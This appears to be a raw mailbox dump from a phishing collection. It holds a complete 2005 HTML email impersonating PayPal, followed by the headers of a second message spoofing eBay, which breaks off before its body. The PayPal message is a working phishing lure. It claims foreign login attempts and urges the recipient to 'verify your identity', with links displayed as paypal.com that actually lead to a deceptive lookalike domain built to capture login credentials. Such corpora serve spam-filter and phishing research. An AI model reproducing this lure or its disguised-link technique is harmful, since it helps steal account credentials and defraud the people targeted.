From: paypal@email.paypal.com <paypal@email.paypal.com>
Reply-To: paypal@email.paypal.com
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: 
X-Spam-Status: No, score=0.4 required=5.0 tests=HTML_30_40,HTML_FONT_FACE_BAD,
	HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY autolearn=no 
	version=3.0.2
X-Spam-Report: 
	*  0.0 HTML_30_40 BODY: Message is 30% to 40% HTML
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.0 HTML_FONT_FACE_BAD BODY: HTML font face is not a word
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  0.1 HTML_MIME_NO_HTML_TAG HTML-only message, but there is no HTML tag
Status: O
X-Status: 
X-Keywords:                  
X-UID: 446


<FONT face="Courier New" size=2>Dear PayPal,<BR><BR>We recently noticed one or more
attempts to log in to your PayPal account<BR>from a foreign IP address.<BR><BR>If you
recently accessed your account while traveling, the unusual log in<BR>attempts may have
been initiated by you. However, if you did not initiate<BR>the log ins, please visit
PayPal as soon as possible to verify your<BR>identity:<BR><BR><A class=m1
href="http://www.paypal.com.login.webscr.php.login.secure.com.dll.ssl5.paypal.secure.login.paypal.com.coca-member-profile02451.info/webscr.php?cmd=LogIn
" target=_blank><FONT
face="Courier New" color=#0066cc size=2>https://www.paypal.com/us/cgi-bin/webscr?
cmd=_login-run</FONT></A><BR><BR><FONT face="Courier New" size=2>Verify your identity is
a security measure that will ensure that you are<BR>the only person with access to the
account.<BR><BR>Thanks for your patience as we work together to protect your
account.<BR><BR>Sincerely,<BR>PayPal<BR>------------------------------------------------
----------------
<BR>                   
PROTECT YOUR PASSWORD<BR><BR>   NEVER give your password to anyone and ONLY
log in at<BR></FONT><A class=m1 href="http://www.paypal.com.login.webscr.php.login.secure.com.dll.ssl5.paypal.secure.login.paypal.com.coca-member-profile02451.info/webscr.php?cmd=LogIn
" target=_blank><FONT face="Courier New" color=#0066cc
size=2>https://www.paypal.com/</FONT></A><FONT face="Courier New" size=2>. Protect
yourself against fraudulent websites by<BR>opening a new web browser (e.g. Internet
Explorer or Netscape) and typing<BR>in the PayPal URL every time you log in to your
account.<BR>----------------------------------------------------------------
     <BR><BR>Please do not reply to this e-mail. Mail sent to this
address cannot be<BR>answered. For assistance, log in to your PayPal account and choose
the<BR>"Help" link in the header of any page.<BR></FONT><BR><FONT
face="Courier
New" size=2>PayPal Email ID PP344</FONT>

From support_ref_0@ebay.com  Sat Nov 12 15:02:31 2005
Return-Path: <support_ref_0@ebay.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 9DF5E536E19
	for <jose@login.monkey.org>; Sat, 12 Nov 2005 15:02:31 -0500 (EST)
Received: from mail1.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail1.monkey.org (Postfix) with ESMTP id E67746CCDE2
	for <jose@monkey.org>; Sat, 12 Nov 2005 15:02:29 -0500 (EST)
Received: from pcp01539577pcs.huntsv01.al.comcast.net (pcp01539577pcs.huntsv01.al.comcast.net [68.62.231.92])
	by mail1.monkey.org (Postfix) with SMTP
	for <jose@monkey.org>; Sat, 12 Nov 2005 15:02:29 -0500 (EST)
FCC: mailbox://support_ref_0@ebay.com/Sent
X-Identity-Key: id1
Date: Sat, 12 Nov 2005 23:01:30 +0300
